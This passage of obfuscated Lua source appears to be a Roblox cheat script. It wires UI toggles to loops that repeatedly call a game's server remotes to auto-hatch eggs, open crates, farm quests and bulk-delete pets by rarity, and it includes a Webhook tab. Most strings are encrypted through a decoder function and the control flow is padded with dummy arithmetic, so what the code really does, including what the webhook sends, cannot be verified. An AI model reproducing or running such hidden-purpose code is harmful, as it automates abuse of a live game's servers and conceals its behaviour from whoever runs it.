,false);v39={v7("\64\84\100\145\221\153\115\85\114","\235\18\33\23\229\158"),v7("\99\179\205\173\85\168\226\169\81\174\196","\219\48\218\161"),v7("\195\126\112\77\248\93\225\240\116","\128\132\17\28\41\187\47"),v7("\37\59\7\55\82\15\54\37\40\92\21\55","\61\97\82\102\90"),v7("\158\47\175\66\200\86\29\29\165\56\174\104\213\86\10\12","\105\204\78\203\43\167\55\126"),v7("\149\166\34\10\26\10\210\92\134\184\34\10\22","\49\197\202\67\126\115\100\167"),v7("\18\90\204\61\133\68\125\37\90\203\44","\62\87\59\191\73\224\54")};v40=v32.AutoHatch:AddLeftGroupbox(v7("\207\3\238\202\239\11\244\206\167\4\255\200\243\23\232\204\244\66\160\137","\169\135\98\154"));v41=v32.AutoHatch:AddLeftGroupbox(v7("\234\98\48\91\189\23\205\199\114\48\81\189\105\136","\168\171\23\68\52\157\83"));v40:AddDropdown(v7("\213\100\225\162\13\44\147\247\121\252\163\34","\231\148\17\149\205\69\77"),{[v7("\182\166\203\238\82\236","\159\224\199\167\155\55")]={v7("\219\250\49\219\227\246\56","\178\151\147\92"),v7("\169\252\94\38\26","\26\236\157\44\82\114\44"),v7("\3\45\204","\59\74\78\181"),v7("\9\208\76\91","\211\69\177\58\58"),v7("\149\233\120\246\226\195\184\233\124","\171\215\133\25\149\137"),v7("\194\218\43\233\251\49\240","\34\129\168\82\154\143\80\156"),v7("\168\189\63\31\77\64","\233\229\210\83\107\40\46"),v7("\242\77\62\215\23","\101\161\34\82\182"),v7("\197\2\86\240","\78\136\109\57\158\187\130\226"),v7("\23\60\252","\145\94\95\153"),v7("\223\216\6\219\71\185\250","\215\157\173\116\181\46"),v7("\22\187\136\253\212\32\160","\186\85\212\235\146"),v7("\242\128\26\243","\56\162\225\118\158\89\142"),v7("\104\23\197\174\49\205\78\0","\184\60\101\160\207\66"),v7("\18\142\125\177","\220\81\226\28"),v7("\56\220\140\252\204\206\0\221","\167\115\181\226\155\138"),v7("\210\45\244\89\114\117\201\236","\166\130\66\135\60\27\17"),v7("\118\95\221\97","\80\36\42\174\21"),v7("\121\25\51\125\75\4","\26\46\112\87"),v7("\152\55\164\121","\212\217\67\203\20\223\223\37"),v7("\147\159\161\214\191\158\171\215\180\153","\178\218\237\200"),v7("\155\160\242\209\184\161","\176\214\213\134"),v7("\218\184\181\216\173\87\75","\57\148\205\214\180\200\54"),v7("\38\207\48\44","\22\114\157\85\84"),v7("\236\206\1\198\84\224\167\214\206","\200\164\171\115\164\61\150"),v7("\153\241\14\97\138\176\251","\227\222\148\99\37"),v7("\23\91\92\249\223\60\65\65\255\245","\153\83\50\50\150"),v7("\124\98\124\17","\45\61\22\19\124\19\203"),v7("\229\27\3\250\47\105\173\201\27\14","\217\161\114\109\149\98\16"),v7("\36\47\49\120\153\115\21","\20\114\64\88\28\220"),v7("\2\21\211\166\221\215\186","\221\81\97\178\212\152\176"),v7("\227\226\31\238\22\204\194\26\252","\122\173\135\125\155"),v7("\166\205\1\186\52\25\199\136\196\37\190\56","\168\228\161\96\217\95\81"),v7("\233\222\45\87\42\67","\55\187\177\78\60\79"),v7("\14\215\93\238\84\223\149\35\197","\224\77\174\63\139\38\175"),v7("\169\68\76\43\139\83","\78\228\33\56"),v7("\234\123\183\19\150\203\127","\229\174\30\210\99"),v7("\43\255\135\84\249\50\43\18\236\136\17\200\58\62","\89\123\141\230\49\141\93"),v7("\223\120\249\2\24\79\242\99\226\76\53\77\244","\42\147\17\150\108\112"),v7("\40\170\44\123\238\253\28\230\8\120\224","\136\111\198\77\31\135"),v7("\35\27\162\88\188\164\50\174\5","\201\98\105\199\54\221\132\119"),v7("\145\9\130\53\7\49\236\156\11\132","\204\217\108\227\65\98\85"),v7("\123\215\240\247\34\193\82\131\208\226\43","\160\62\163\149\133\76"),v7("\255\174\11\42\209\216\175\77\10\196\209","\163\182\192\109\79"),v7("\17\43\2\197\231\116\3\7\199","\149\84\70\96\160"),v7("\11\14\12\255\51\35\10\234","\141\88\102\109"),v7("\153\86\198\124\3\59\92\210\187\118\205\119","\161\211\51\170\16\122\93\53"),v7("\216\188\179\42\222\169\181","\72\155\206\210")},[v7("\98\127\82\15\38\74\110","\83\38\26\52\110")]="",[v7("\117\2\43\82\81","\38\56\119\71")]=false,[v7("\199\234\64\194","\54\147\143\56\182\69")]=v7("\229\132\243\76\220\194\193\218\78\216","\191\182\225\159\41"),[v7("\31\29\39\89\159\142\210","\162\75\114\72\53\235\231")]=v7("\169\59\67\162\96\7\128\57\71\246\90\13\130\124","\98\236\92\36\130\51"),[v7("\135\24\0\182\71\169\182\59","\80\196\121\108\218\37\200\213")]=function(v124) local v125=0 + 0 ;while true do if (v125==(1011 -(334 + 677))) then getgenv().EggSelect=v124;warn(v7("\59\90\53\63\120\27\154\16\124\16\107\78\28\183\64\64\7\115\78\13\158\5\119\66\63\17","\234\96\19\98\31\43\110"),v124);break;end end end});v12=5;end if (v12==(26 -19)) then v43:AddDropdown(v7("\109\196\167\35\204\74\240\190\35\220\74","\175\62\161\203\70"),{[v7("\10\220\207\6\48\47","\85\92\189\163\115")]={v7("\13\169\54\61\40\184\112\10\32\188\32\61\59\236\20\55\42","\88\73\204\80"),v7("\10\134\22\67\40\206\110\210\80\100\44\219\45\139\80\100\38\201\61","\186\78\227\112\38\73")},[v7("\216\82\251\84\70\118\232","\26\156\55\157\53\51")]="",[v7("\161\205\26\205\177","\48\236\184\118\185\216")]=false,[v7("\209\184\79\36","\84\133\221\55\80\175")]=v7("\142\226\40\163\196\72\253\214\49\163\212\72\253","\60\221\135\68\198\167"),[v7("\218\178\247\143\86\208\254","\185\142\221\152\227\34")]=v7("\122\192\86\249\75\115\213\87\214\68\186\114\38\242\75\209\23\201\70\63\242\91\209\94\245\77\32\183","\151\56\165\55\154\35\83"),[v7("\131\66\9\226\162\66\6\229","\142\192\35\101")]=function(v126) local v127=0 -0 ;local v128;while true do if (v127==0) then v128=0 + 0 ;while true do if (v128==0) then getgenv().QuestBeta=v126;warn(v7("\237\92\30\227\212\153\188\6\217\103\61\166\245\177\236\37\211\121\44\160\243\137\168\86\140","\118\182\21\73\195\135\236\204"),v126);break;end end break;end end end});v43:AddToggle(v7("\41\41\14\79\53\24\248\27\40","\157\104\92\122\32\100\109"),{[v7("\151\163\215\222","\203\195\198\175\170\93\71\237")]=v7("\11\69\63\215\93\20\188\15\94\42\218\119\16\238\35\11\27\210\86\2","\156\78\43\94\181\49\113"),[v7("\86\237\194\162\30\79\109","\25\18\136\164\195\107\35")]=false,[v7("\220\34\166\67\102\181\209","\216\136\77\201\47\18\220\161")]=v7("\12\249\63\213\46\221\144\32","\226\77\140\75\186\104\188"),[v7("\154\207\220\51\77\184\205\219","\47\217\174\176\95")]=function(v129) local v130=0;while true do if (v130==0) then getgenv().AutoFarmQuest=v129;warn(v7("\131\244\65\66\129\65\104\54\183\207\98\7\160\105\56\21\189\209\115\1\166\81\124\102\226","\70\216\189\22\98\210\52\24"),v129);break;end end end});v43:AddToggle(v7("\251\202\183\136\251\219\203\160\143\246\204\218\173\147\203\139","\179\186\191\195\231"),{[v7("\205\58\0\240","\132\153\95\120")]=v7("\144\167\26\34\223\219\180\178\186\78\8\225\223\174\165\242\53\53\166\231","\192\209\210\110\77\151\186"),[v7("\196\6\36\232\234\200\244","\164\128\99\66\137\159")]=false,[v7("\52\134\230\178\20\128\249","\222\96\233\137")]=v7("\145\178\179\28\128\250\254\190\243\130\9\141\253\228\249\182\160\24\200\235\161","\144\217\211\199\127\232\147"),[v7("\219\46\50\36\215\68\1\79","\36\152\79\94\72\181\37\98")]=function(v131) local v132=0 -0 ;while true do if ((0 -0)==v132) then getgenv().EvAutoHatchingx1=v131;warn(v7("\236\241\112\127\228\205\87\47\216\202\83\58\197\229\7\12\210\212\66\60\195\221\67\127\141","\95\183\184\39"),v131);break;end end end});v43:AddToggle(v7("\148\42\243\41\124\129\22\182\55\194\48\81\142\22\173\108","\98\213\95\135\70\52\224"),{[v7("\202\166\209\99","\52\158\195\169\23")]=v7("\91\169\38\123\174\52\111\136\114\252\23\98\131\59\111\203\65\164\97\73","\235\26\220\82\20\230\85\27"),[v7("\172\164\239\195\97\132\181","\20\232\193\137\162")]=false,[v7("\22\208\202\170\243\133\7","\17\66\191\165\198\135\236\119")]=v7("\39\174\186\16\247\225\226\214\79\138\184\22\241\252\172\212\8\168\238\11\172","\177\111\207\206\115\159\136\140"),[v7("\38\136\28\24\214\78\92\14","\63\101\233\112\116\180\47")]=function(v133) local v134=0 + 0 ;local v135;while true do if ((1420 -(1004 + 416))==v134) then v135=1957 -(1621 + 336) ;while true do if ((1939 -(337 + 1602))==v135) then getgenv().EvAutoHatchingx3=v133;warn(v7("\248\18\218\82\203\35\211\43\226\0\236\51\209\6\173\33\253\58\198\56\249\23\252\118\153","\86\163\91\141\114\152"),v133);break;end end break;end end end});v43:AddToggle(v7("\114\30\96\124\18\82\31\119\123\31\69\14\122\103\34\11","\90\51\107\20\19"),{[v7("\185\245\157\251","\93\237\144\229\143")]=v7("\52\227\228\22\35\71\1\245\248\89\46\80\16\248\228\89\48\94\77\203","\38\117\150\144\121\107"),[v7("\9\190\232\59\56\183\250","\90\77\219\142")]=false,[v7("\210\11\46\53\88\14\106","\26\134\100\65\89\44\103")]=v7("\217\226\36\32\172\248\237\55\99\129\231\230\62\55\228\244\228\55\99\188\169","\196\145\131\80\67"),[v7("\61\177\10\4\26\233\29\187","\136\126\208\102\104\120")]=function(v136) getgenv().EvAutoHatchingx8=v136;warn(v7("\67\163\249\3\156\71\45\65\119\152\218\70\189\111\125\98\125\134\203\64\187\87\57\17\34","\49\24\234\174\35\207\50\93"),v136);end});v42:AddDropdown(v7("\47\224\252\156\116\31","\17\108\146\157\232"),{[v7("\125\194\24\248\42\187","\200\43\163\116\141\79")]=v39,[v7("\155\51\59\130\165\248\247","\131\223\86\93\227\208\148")]=v7("\209\80\165\162\62\167\226\81\179","\213\131\37\214\214\125"),[v7("\11\62\41\171\232","\129\70\75\69\223")]=false,[v7("\114\206\235\253","\143\38\171\147\137\28")]=v7("\227\135\181\246\0\247\148\243\144\184\231\6","\180\176\226\217\147\99\131"),[v7("\231\182\32\11\199\176\63","\103\179\217\79")]=v7("\105\165\29\193\68\204\144\79\187\25\214\85\133\172\68\247","\195\42\215\124\181\33\236"),[v7("\46\88\59\50\39\249\14\82","\152\109\57\87\94\69")]=function(v138) local v139=0;local v140;while true do if (v139==0) then v140=1517 -(1014 + 503) ;while true do if ((1015 -(446 + 569))==v140) then getgenv().CrateSelection=v138;warn(v7("\194\254\61\227\141\199\68\184\246\197\30\166\172\239\20\155\252\219\15\160\170\215\80\232\185\141","\200\153\183\106\195\222\178\52"),v138);break;end end break;end end end});v42:AddToggle(v7("\17\241\137\41\76\73\29\243\141\51","\58\82\131\232\93\41"),{[v7("\183\82\200\1","\95\227\55\176\117\61")]=v7("\57\107\55\68\235\55\110\38\69\235\59\108\34\95\174\11","\203\120\30\67\43"),[v7("\213\32\75\238\204\253\49","\185\145\69\45\143")]=false,[v7("\190\16\22\170\200\131\15","\188\234\127\121\198")]=v7("\23\34\22\141\120\17\1\130\44\55\0","\227\88\82\115"),[v7("\96\30\182\171\0\114\64\20","\19\35\127\218\199\98")]=function(v141) local v142=0 + 0 ;while true do if (v142==(0 -0)) then getgenv().AutoOpenCrates=v141;warn(v7("\39\210\61\162\47\238\26\242\19\233\30\231\14\198\74\209\25\247\15\225\8\254\14\162\70","\130\124\155\106"),v141);break;end end end});v44=v32.Webhook:AddLeftGroupbox(v7("\226\206\244\167\172\249\119\255\243\222\248\172\183\255\115\177\198\139\172\239","\223\181\171\150\207\195\150\28"));v45=v44:AddLabel(v7("\123\63\225\166\6\67\49\163\155\27\64\122\185\238\7\67\46\235\167\7\75","\105\44\90\131\206"),true);v12=8;end if (16==v12) then spawn(function() Toggles.AutoHatchEventx1:OnChanged(function() while getgenv().EvAutoHatchingx1 and task.wait()  do local v183=0 + 0 ;local v184;while true do if ((0 -0)==v183) then v184=0 + 0 ;while true do if (v184==(505 -(223 + 282))) then game:GetService(v7("\140\245\11\13\94\115\62\170\245\31\50\67\127\45\191\247\30","\95\222\144\123\97\55\16")).Packages.Knit.Services.EventService.RF.ClaimEgg:InvokeServer();task.wait();break;end end break;end end end end);end);spawn(function() Toggles.AutoDeleteCommon:OnChanged(function() while getgenv().AutoDeleteCommon and task.wait()  do local v185=0 + 0 ;local v186;while true do if (v185==(1 -0)) then task.wait();break;end if (v185==(0 -0)) then v186=game:GetService(v7("\43\129\170\79\234\26\133\174\70\231\42\144\181\81\226\30\129","\131\121\228\218\35")).Packages.Knit.Services.PetService.RF.getOwned:InvokeServer(game:GetService(v7("\233\220\35\24\124\9\202","\123\185\176\66\97\25")).LocalPlayer);for v315,v316 in pairs(v186) do if (v316.Rarity==v7("\235\0\20\92\26\33","\81\168\111\121\49\117\79\56")) then game:GetService(v7("\245\15\245\186\206\9\228\162\194\14\214\162\200\24\228\177\194","\214\167\106\133")).Packages.Knit.Services.PetService.RF.delete:InvokeServer(v315);end end v185=671 -(623 + 47) ;end end end end);end);spawn(function() Toggles.AutoDeleteUncommon:OnChanged(function() while getgenv().AutoDeleteUncommon and task.wait()  do local v187=0;local v188;while true do if (v187==(45 -(32 + 13))) then local v287=0 + 0 ;while true do if (v287==0) then v188=game:GetService(v7("\27\61\92\67\61\124\216\61\61\72\124\32\112\203\40\63\73","\185\73\88\44\47\84\31")).Packages.Knit.Services.PetService.RF.getOwned:InvokeServer(game:GetService(v7("\184\219\27\185\214\237\155","\159\232\183\122\192\179")).LocalPlayer);for v368,v369 in pairs(v188) do if (v369.Rarity==v7("\17\60\171\46\41\63\167\47","\65\68\82\200")) then game:GetService(v7("\23\85\98\44\198\204\127\49\85\118\19\219\192\108\36\87\119","\30\69\48\18\64\175\175")).Packages.Knit.Services.PetService.RF.delete:InvokeServer(v368);end end v287=1 + 0 ;end if (v287==1) then v187=1;break;end end end if (v187==(1802 -(1070 + 731))) then task.wait();break;end end end end);end);spawn(function() Toggles.AutoDeleteRare:OnChanged(function() while getgenv().AutoDeleteRare and task.wait()  do local v189=0 + 0 ;local v190;while true do if (v189==(1405 -(1257 + 147))) then task.wait();break;end if (v189==(0 + 0)) then v190=game:GetService(v7("\194\41\15\224\50\243\45\11\233\63\195\56\16\254\58\247\41","\91\144\76\127\140")).Packages.Knit.Services.PetService.RF.getOwned:InvokeServer(game:GetService(v7("\208\4\71\56\214\168\198","\176\128\104\38\65\179\218\181")).LocalPlayer);for v317,v318 in pairs(v190) do if (v318.Rarity==v7("\226\197\208\16","\117\176\164\162")) then game:GetService(v7("\182\199\21\252\211\122\133\214\0\244\233\109\139\208\4\247\223","\25\228\162\101\144\186")).Packages.Knit.Services.PetService.RF.delete:InvokeServer(v317);end end v189=1;end end end end);end);spawn(function() Toggles.AutoDeleteEpic:OnChanged(function() while getgenv().AutoDeleteEpic and task.wait(0.1)  do local v191=0 -0 ;local v192;while true do if (v191==1) then task.wait();break;end if (v191==(133 -(98 + 35))) then local v288=0;while true do if (v288==(0 + 0)) then v192=game:GetService(v7("\122\51\169\2\251\231\73\34\188\10\193\240\71\36\184\9\247","\132\40\86\217\110\146")).Packages.Knit.Services.PetService.RF.getOwned:InvokeServer(game:GetService(v7("\78\199\38\165\162\97\239","\62\30\171\71\220\199\19\156")).LocalPlayer);for v370,v371 in pairs(v192) do if (v371.Rarity==v7("\101\85\165\53","\45\32\37\204\86\61\169\79")) then game:GetService(v7("\103\80\21\176\188\127\84\65\0\184\134\104\90\71\4\187\176","\28\53\53\101\220\213")).Packages.Knit.Services.PetService.RF.delete:InvokeServer(v370);end end v288=1;end if (v288==1) then v191=3 -2 ;break;end end end end end end);end);spawn(function() Toggles.AutoDeleteLegendary:OnChanged(function() while getgenv().AutoDeleteLegendary and task.wait(0.1 -0 )  do local v193=0;local v194;while true do if (v193==(0 + 0)) then local v289=0 + 0 ;while true do if ((1 + 0)==v289) then v193=558 -(395 + 162) ;break;end if (v289==(0 + 0)) then v194=game:GetService(v7("\63\89\24\77\83\162\81\203\8\88\59\85\85\179\81\216\8","\191\109\60\104\33\58\193\48")).Packages.Knit.Services.PetService.RF.getOwned:InvokeServer(game:GetService(v7("\183\219\25\254\130\197\11","\135\231\183\120")).LocalPlayer);for v372,v373 in pairs(v194) do if (v373.Rarity==v7("\202\15\75\225\59\30\168\244\19","\201\134\106\44\132\85\122")) then game:GetService(v7("\4\9\103\51\8\15\201\55\51\8\68\43\14\30\201\36\51","\67\86\108\23\95\97\108\168")).Packages.Knit.Services.PetService.RF.delete:InvokeServer(v372);end end v289=1942 -(816 + 1125) ;end end end if (v193==(1 -0)) then task.wait();break;end end end end);end);spawn(function() Toggles.AutoDeleteMythic:OnChanged(function() while getgenv().AutoDeleteMythic and task.wait(1148.1 -(701 + 447) )  do local v195=0;local v196;local v197;while true do if (v195==(0 -0)) then v196=0;v197=nil;v195=1;end if (v195==1) then while true do if (v196==(0 -0)) then v197=game:GetService(v7("\150\61\92\6\173\39\212\68\161\60\127\30\171\54\212\87\161","\48\196\88\44\106\196\68\181")).Packages.Knit.Services.PetService.RF.getOwned:InvokeServer(game:GetService(v7("\178\211\221\58\133\182\177","\76\226\191\188\67\224\196\194")).LocalPlayer);for v374,v375 in pairs(v197) do if (v375.Rarity==v7("\244\49\19\248\244\218","\157\185\72\103\144")) then game:GetService(v7("\107\182\154\118\161\178\88\167\143\126\155\165\86\161\139\125\173","\209\57\211\234\26\200")).Packages.Knit.Services.PetService.RF.delete:InvokeServer(v374);end end v196=1342 -(391 + 950) ;end if (v196==1) then task.wait();break;end end break;end end end end);end);spawn(function() Toggles.AutoHatchEventx3:OnChanged(function() while getgenv().EvAutoHatchingx3 and task.wait(0.1 -0 )  do local v198=0 -0 ;local v199;local v200;while true do if (v198==0) then v199=0 -0 ;v200=nil;v198=1 + 0 ;end if (v198==(1 + 0)) then while true do if (v199==(3 -2)) then task.wait();break;end if (v199==(1522 -(251 + 1271))) then v200={[1]=3};game:GetService(v7("\51\203\182\141\89\209\0\218\163\133\99\198\14\220\167\134\85","\178\97\174\198\225\48")).Packages.Knit.Services.EventService.RF.ClaimEgg:InvokeServer(unpack(v200));v199=1;end end break;end end end end);end);spawn(function() Toggles.AutoHatchEventx8:OnChanged(function() while getgenv().EvAutoHatchingx8 and task.wait(0.1)  do local v201={[1 + 0 ]=8};game:GetService(v7("\253\83\20\253\113\229\14\219\83\0\194\108\233\29\206\81\1","\111\175\54\100\145\24\134")).Packages.Knit.Services.EventService.RF.ClaimEgg:InvokeServer(unpack(v201));task.wait();end end);end);v12=45 -28 ;end if (v12==(12 -7)) then local v74=0 -0 ;while true do if (v74==(1263 -(1147 + 112))) then function AutoHatchx8() local v218=0 + 0 ;local v219;while true do if (v218==(0 -0)) then v219={[1 + 0 ]=getgenv().EggSelect,[699 -(335 + 362) ]={},[4 + 0 ]=false,[7 -2 ]=true};game:GetService(v7("\49\90\211\247\10\92\194\239\6\91\240\239\12\77\194\252\6","\155\99\63\163")).Packages.Knit.Services.EggService.RF.purchaseEgg:InvokeServer(unpack(v219));break;end end end v12=6;break;end if (v74==(2 -1)) then v41:AddToggle(v7("\163\91\75\80\148\204\82\135\90\90\109\177\219\91","\62\226\46\63\63\208\169"),{[v7("\209\28\77\151","\62\133\121\53\227\127\109\79")]=v7("\49\1\38\250\150\138\167\28\17\38\240\150\156\163\2\17\114\229\211\186\177","\194\112\116\82\149\182\206"),[v7("\29\173\74\25\213\238\26","\110\89\200\44\120\160\130")]=false,[v7("\159\204\68\74\87\67\43","\45\203\163\43\38\35\42\91")]=v7("\243\144\200\44\199\141\81\222\128\200\38","\52\178\229\188\67\231\201"),[v7("\2\64\92\8\245\93\32\42","\67\65\33\48\100\151\60")]=function(v220) local v221=0 -0 ;while true do if (v221==(0 -0)) then getgenv().AutoDeleteRare=v220;warn(v7("\228\206\153\152\192\202\247\190\215\225\203\226\188\229\179\236\226\162\221\240\203\226\170\152\169","\147\191\135\206\184"),v220);break;end end end});v41:AddToggle(v7("\165\61\178\206\252\86\190\129\60\163\228\200\90\177","\210\228\72\198\161\184\51"),{[v7("\2\76\235\4","\174\86\41\147\112\19")]=v7("\122\21\153\4\101\43\20\167\94\20\136\75\0\31\24\168\27\16\136\31\54","\203\59\96\237\107\69\111\113"),[v7("\0\19\170\224\36\252\195","\183\68\118\204\129\81\144")]=false,[v7("\58\162\127\232\31\139\30","\226\110\205\16\132\107")]=v7("\202\214\244\214\1\207\198\236\220\85\238","\33\139\163\128\185"),[v7("\116\89\8\210\85\89\7\213","\190\55\56\100")]=function(v222) getgenv().AutoDeleteEpic=v222;warn(v7("\109\134\11\94\32\246\227\70\160\46\10\22\241\206\22\156\57\18\22\224\231\83\171\124\68","\147\54\207\92\126\115\131"),v222);end});v74=2;end if (v74==3) then function AutoHatchx1() local v224=0 -0 ;local v225;while true do if (v224==(566 -(237 + 329))) then v225={[3 -2 ]=getgenv().EggSelect,[2]={},[3 + 1 ]=false};game:GetService(v7("\250\95\30\33\16\219\174\151\205\94\61\57\22\202\174\132\205","\227\168\58\110\77\121\184\207")).Packages.Knit.Services.EggService.RF.purchaseEgg:InvokeServer(unpack(v225));break;end end end function AutoHatchx3() local v226=0;local v227;while true do if (v226==0) then v227={[1 + 0 ]=getgenv().EggSelect,[1126 -(408 + 716) ]={},[4]=true,[18 -13 ]=false};game:GetService(v7("\73\57\175\76\184\216\112\177\126\56\140\84\190\201\112\162\126","\197\27\92\223\32\209\187\17")).Packages.Knit.Services.EggService.RF.purchaseEgg:InvokeServer(unpack(v227));break;end end end v74=4;end if (v74==0) then v41:AddToggle(v7("\39\10\70\200\136\119\135\3\11\87\228\163\127\134\9\17","\235\102\127\50\167\204\18"),{[v7("\100\164\237\55","\78\48\193\149\67\36")]=v7("\17\11\148\23\1\20\27\140\29\85\53\94\163\23\76\61\17\142\88\81\53\10\147","\33\80\126\224\120"),[v7("\200\173\5\197\73\224\188","\60\140\200\99\164")]=false,[v7("\179\251\11\42\182\142\228","\194\231\148\100\70")]=v7("\103\89\213\172\182\236\67\64\196\183\243","\168\38\44\161\195\150"),[v7("\163\253\142\122\50\233\181\29","\118\224\156\226\22\80\136\214")]=function(v228) getgenv().AutoDeleteCommon=v228;warn(v7("\121\199\110\192\113\251\73\144\77\252\77\133\80\211\25\179\71\226\92\131\86\235\93\192\24","\224\34\142\57"),v228);end});v41:AddToggle(v7("\255\178\209\210\87\244\81\11\202\162\240\211\112\254\80\3\209\169","\110\190\199\165\189\19\145\61"),{[v7("\238\238\111\252","\167\186\139\23\136\235")]=v7("\59\160\156\2\90\145\141\1\31\161\141\77\47\187\171\2\23\184\135\3\90\165\141\25\9","\109\122\213\232"),[v7("\202\242\164\49\251\251\182","\80\142\151\194")]=false,[v7("\55\201\120\64\23\207\103","\44\99\166\23")]=v7("\93\226\61\57\115\128\121\251\44\34\54","\196\28\151\73\86\83"),[v7("\208\2\37\28\128\89\27\125","\22\147\99\73\112\226\56\120")]=function(v230) local v231=821 -(344 + 477) ;while true do if (v231==0) then getgenv().AutoDeleteUncommon=v230;warn(v7("\131\92\213\181\190\173\101\242\250\159\172\112\240\200\205\139\112\238\240\142\172\112\230\181\215","\237\216\21\130\149"),v230);break;end end end});v74=1 + 0 ;end if (v74==(1763 -(1188 + 573))) then v41:AddToggle(v7("\44\36\33\114\41\123\1\52\33\120\33\123\10\52\59\121\12\108\20","\30\109\81\85\29\109"),{[v7("\203\116\76\162","\156\159\17\52\214\86\190")]=v7("\143\250\169\179\238\203\184\176\171\251\184\252\130\234\186\185\160\235\188\174\183\175\173\185\186\252","\220\206\143\221"),[v7("\162\120\43\22\205\192\198","\178\230\29\77\119\184\172")]=false,[v7("\193\177\5\23\99\241\229","\152\149\222\106\123\23")]=v7("\252\51\226\76\245\249\35\250\70\161\216","\213\189\70\150\35"),[v7("\108\84\120\4\77\84\119\3","\104\47\53\20")]=function(v232) local v233=0 -0 ;while true do if (v233==(0 + 0)) then getgenv().AutoDeleteLegendary=v232;warn(v7("\152\101\182\92\143\26\179\92\142\14\168\10\177\113\193\47\185\3\166\79\149\25\184\79\249","\111\195\44\225\124\220"),v232);break;end end end});v41:AddToggle(v7("\249\83\20\124\143\174\212\67\20\118\134\178\204\78\9\112","\203\184\38\96\19\203"),{[v7("\13\118\97\85","\174\89\19\25\33")]=v7("\14\7\70\65\183\163\14\35\23\70\75\183\170\18\59\26\91\77\183\151\14\59\1","\107\79\114\50\46\151\231"),[v7("\29\163\179\40\159\53\163","\160\89\198\213\73\234\89\215")]=false,[v7("\124\126\187\242\209\65\97","\165\40\17\212\158")]=v7("\196\204\28\60\102\193\220\4\54\50\224","\70\133\185\104\83"),[v7("\39\68\72\38\203\5\70\79","\169\100\37\36\74")]=function(v234) local v235=0 -0 ;while true do if (v235==(0 -0)) then getgenv().AutoDeleteMythic=v234;warn(v7("\59\174\149\16\51\146\178\64\15\149\182\85\18\186\226\99\5\139\167\83\20\130\166\16\90","\48\96\231\194"),v234);break;end end end});v74=7 -4 ;end end end if (v12==13) then local v75=1529 -(508 + 1021) ;while true do if (v75==(0 + 0)) then v59=nil;function v59() local v236=1166 -(228 + 938) ;local v237;while true do if (v236==(685 -(332 + 353))) then v237={[1 -0 ]=getgenv().Npc,[5 -3 ]=workspace.GameObjects.ArmWrestling[getgenv().World].NPC[getgenv().Npc].Table,[3 + 0 ]=getgenv().World};game:GetService(v7("\178\112\42\67\231\131\116\46\74\234\179\97\53\93\239\135\112","\142\224\21\90\47")).Packages.Knit.Services.ArmWrestleService.RE.onEnterNPCTable:FireServer(unpack(v237));break;end end end v75=1 + 0 ;end if (1==v75) then v60={};v61=game:GetService(v7("\70\209\55\90\173\136\132\96\209\35\101\176\132\151\117\211\34","\229\20\180\71\54\196\235")).Tools.Grips:GetChildren();v75=2;end if (v75==2) then table.sort(v61,function(v238,v239) local v240=0 -0 ;local v241;local v242;while true do local v277=423 -(18 + 405) ;while true do if (v277==(0 + 0)) then if (v240==(1 + 0)) then return v241<v242 ;end if ((0 -0)==v240) then local v376=978 -(194 + 784) ;while true do if (v376==0) then v241=tonumber(string.match(v238.Name,v7("\108\122\138","\224\73\30\161\131\149\202")));v242=tonumber(string.match(v239.Name,v7("\180\225\186","\48\145\133\145")));v376=1;end if (v376==1) then v240=1771 -(694 + 1076) ;break;end end end break;end end end end);for v243,v244 in ipairs(v61) do table.insert(v60,v244.Name);end v75=1907 -(122 + 1782) ;end if (v75==3) then v55:AddDropdown(v7("\110\67\186\226\250\43","\76\58\44\213\142\177"),{[v7("\253\37\30\56\125\216","\24\171\68\114\77")]=v60,[v7("\203\24\86\83\146\210\16","\205\143\125\48\50\231\190\100")]="",[v7("\236\178\24\17\232","\194\161\199\116\101\129\131\191")]=false,[v7("\216\33\208\188","\194\140\68\168\200\151")]=v7("\113\254\217\32\246\86\187\226\32\252\69\243\193\101\206\96\242\214\32\229\81\198","\149\34\155\181\69"),[v7("\55\242\218\246\23\244\197","\154\99\157\181")]=v7("\186\10\229\167\228\153\79\223\165\224\136\12\248\169\227\131\79","\140\237\111\140\192"),[v7("\37\24\113\20\4\24\126\19","\120\102\121\29")]=function(v245) local v246=0;while true do if ((0 + 0)==v246) then getgenv().BicepsKg=v245;warn(v7("\151\202\142\123\159\246\169\43\163\241\173\62\190\222\249\8\169\239\188\56\184\230\189\123\246","\91\204\131\217"),v245);break;end end end});v55:AddDropdown(v7("\250\240\90\216\152\218\172","\158\174\159\53\180\211\189"),{[v7("\100\252\225\200\114\166","\213\50\157\141\189\23")]=v60,[v7("\218\35\130\161\103\168\234","\196\158\70\228\192\18")]="",[v7("\103\74\29\90\208","\185\42\63\113\46")]=false,[v7("\224\216\57\45","\123\180\189\65\89")]=v7("\241\137\252\225\138\214\204\199\225\128\197\132\228\164\178\234\141\254\224\154\255","\233\162\236\144\132"),[v7("\134\203\241\22\173\255\79","\63\210\164\158\122\217\150")]=v7("\4\206\255\235\65\236\115\248\243\224\76\251\39\194\249\226\9","\152\83\171\150\140\41"),[v7("\161\228\143\63\214\26\11\137","\104\226\133\227\83\180\123")]=function(v247) local v248=0;while true do if (v248==0) then getgenv().HandsKG=v247;warn(v7("\56\34\20\16\48\30\51\64\12\25\55\85\17\54\99\99\6\7\38\83\23\14\39\16\89","\48\99\107\67"),v247);break;end end end});v75=4 + 0 ;end if ((4 + 0)==v75) then v53:AddToggle(v7("\255\179\105\223\25\105\223\175\115\247\63\114\206\181","\27\190\198\29\176\77"),{[v7("\219\78\229\32","\46\143\43\157\84\201")]=v7("\118\109\66\205\31\39\218\86\113\88\130\119\18\198\83\107","\168\55\24\54\162\63\115"),[v7("\51\255\38\129\199\194\3","\174\119\154\64\224\178")]=false,[v7("\30\113\202\119\17\174\10","\132\74\30\165\27\101\199\122")]=v7("\10\233\254\165\171\176\244\14\242\235\168\231\129\166\46\238\241\231","\212\79\135\159\199\199\213"),[v7("\90\161\185\75\94\214\27\114","\120\25\192\213\39\60\183")]=function(v249) local v250=0;while true do if (v250==0) then getgenv().AutoGrips=v249;warn(v7("\35\105\8\8\43\85\47\88\23\82\43\77\10\125\127\123\29\76\58\75\12\69\59\8\66","\40\120\32\95"),v249);break;end end end});v12=11 + 3 ;break;end end end if (v12==(43 -28)) then local v76=0 + 0 ;while true do if (v76==1) then spawn(function() Toggles.AutoTrainKnuckles:OnChanged(function() while getgenv().AutoKnuckles and task.wait()  do local v290=1970 -(214 + 1756) ;local v291;while true do if (v290==(0 -0)) then v291={[1 + 0 